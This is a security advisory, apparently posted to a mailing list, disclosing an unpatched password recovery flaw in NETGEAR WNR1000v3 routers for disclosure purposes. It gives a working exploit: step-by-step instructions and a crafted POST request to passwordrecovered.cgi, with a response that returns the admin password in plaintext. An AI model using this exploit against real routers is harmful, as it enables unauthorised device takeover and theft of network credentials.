[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

NETGEAR WNR1000v3 Password Recovery Vulnerability



Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless 
router are affected by a password recovery vulnerability.

Exploiting this vulnerability allows an attacker to recover the router's 
(plaintext) Administrator credentials and subsequently gain full access to the 
device. This vulnerabilty can be exploited remotely if the remote 
administration access feature is enabled (as well as locally via wired or 
wireless access).

Tested Device Model: Netgear N150 WNR1000v3

Tested Device Firmware Versions: V1.0.2.60_60.0.86, V1.0.2.54_60.0.82NA, and 
V1.0.2.62_60.0.87

Potential Impacts: Gaining full control over a wireless router exposes multiple 
attack vectors including: DoS, DNS control (many ways this can be leveraged to 
exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for 
guest and private network) firewall rule and port forwarding manipulation, etc.

Vulnerabilty Status: Vulnerability was privately disclosed to the vendor in 
June of 2013, however they have not yet issued a patch.

Other Notes: This vulnerability remains exploitable when the password recovery 
feature of the router is disabled.

Overview:

The password recovery mechanism appears to be designed to work as follows:

1.) After failing to login the user will be redirected to a password recovery 
page that requests the router serial number

2.) If the user enters the serial number correctly, another page will appear 
that requires the user to correctly answer 2 secret questions

3.) If the user answers the secret questions correctly, the router username and 
password is displayed


The problem: The implementation of this password recovery method has 
issues...lots of issues


Vulnerability and Exploit Details:

1.) Access the router login through a web browser: http://192.168.1.1

2.) Select "Cancel" on the HTTP basic login box (or enter arbitrary 
credentials), the router responds with the following (Note the "unauth.cgi?id" 
parameter):

--------------------------------------------------

HTTP/1.0 401 Unauthorized

WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"

Content-type: text/html
 
<html>
 
<head>
 
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
 
<title>401 Unauthorized</title></head>
 
<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>
 
<p>Access to this resource is denied, your client has not supplied the correct 
authentication.</p><form method="post" action="unauth.cgi?id=78185530" 
name="aForm"></form></body>
 
</html>
--------------------------------------------------
 
3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post 
request:
 
-------------------------------------------------------------------------------------------------
 
POST http://192.168.1.1/passwordrecovered.cgi?id=78185530 HTTP/1.1
 
Accept: text/html, application/xhtml+xml, */*
 
Accept-Language: en-US
 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
 
Content-Type: application/x-www-form-urlencoded
 
Accept-Encoding: gzip, deflate
 
Host: 192.168.1.1
 
Content-Length: 35
 
Connection: Keep-Alive
 
Pragma: no-cache

--------------------------------------------------
The username and (plaintext) password are returned in the response (truncated 
for brevity):
--------------------------------------------------
..
<tr>
 <td class="MNUText" align="right">Router Admin Username</td>
 <td class="MNUText" align="left">admin</td>
 </tr>
 <tr>
 <td class="MNUText" align="right">Router Admin Password</td>
 <td class="MNUText" align="left">D0n'tGuessMe!</td>
 </tr>
..
--------------------------------------------------

Additional details and proof-of-concept exploit can be found here: 

http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html